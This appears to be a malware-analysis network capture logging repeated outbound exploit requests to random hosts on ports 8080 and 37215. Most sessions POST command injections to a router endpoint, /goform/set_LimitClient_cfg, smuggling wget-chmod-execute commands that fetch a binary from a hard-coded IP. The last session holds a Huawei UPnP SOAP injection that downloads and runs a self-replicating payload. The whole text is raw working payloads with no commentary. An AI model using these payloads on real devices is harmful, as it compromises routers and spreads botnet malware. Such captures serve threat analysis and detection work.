                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1704192.168.2.2356002144.20.188.1108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418306112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1705192.168.2.2348420137.86.212.1308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418333054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1706192.168.2.2333486130.79.38.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418354034 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1707192.168.2.2360932108.95.232.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418387890 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1708192.168.2.2346222173.208.203.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418411016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1709192.168.2.2334104129.196.56.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418410063 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1710192.168.2.2356320187.134.160.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418461084 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1711192.168.2.2335268184.19.48.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418492079 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1712192.168.2.233347057.147.187.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.418577909 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1713192.168.2.2333084194.95.65.278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451175928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1714192.168.2.2333414213.185.209.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451208115 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1715192.168.2.2357726146.116.37.2288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451224089 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1716192.168.2.2340806200.206.186.2308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451232910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1717192.168.2.2353348207.67.172.838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451246023 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1718192.168.2.2336646147.123.70.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451256037 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1719192.168.2.234464049.86.131.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451267958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1720192.168.2.2353262107.90.83.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451282024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1721192.168.2.2342626102.205.153.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451303005 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1722192.168.2.2343004178.84.6.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451327085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1723192.168.2.2336274116.103.136.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.451350927 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1724192.168.2.2359024197.143.175.22537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547421932 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1725192.168.2.2341986157.3.175.16237215
                                                        TimestampBytes transferredDirectionData
